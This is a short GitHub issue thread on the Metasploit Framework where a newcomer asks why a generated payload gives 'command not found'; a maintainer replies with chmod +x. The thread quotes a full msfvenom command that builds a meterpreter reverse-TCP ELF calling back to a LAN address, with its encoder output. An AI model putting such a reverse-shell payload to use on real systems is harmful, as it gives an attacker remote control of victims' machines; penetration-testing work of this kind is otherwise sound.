### ISSUE TITLE
Hey guys, I am fresh here, question about payload generation by msfvenom, thanks

### ISSUE THREAD

**Issue by silravend** [rapid7/metasploit-framework#14900]
I simply use
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.30.128 LPORT=4443 -f elf -b '\x00' >reverse_connect.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 4 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=55, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 175 (iteration=0)
x64/xor chosen with final size 175
Payload size: 175 bytes
Final size of elf file: 295 bytes
`

then I try to run at my kali, it told me command not found, I wonder where is wrong?

`$ sudo ./reverse_connect.elf                                         130 ⨯
sudo: ./reverse_connect.elf: command not found
`

**Comment by bcoles** [comment]
```
chmod +x reverse_connect.elf
```

**Comment by silravend** [comment]
oh, thanks, that's fast!
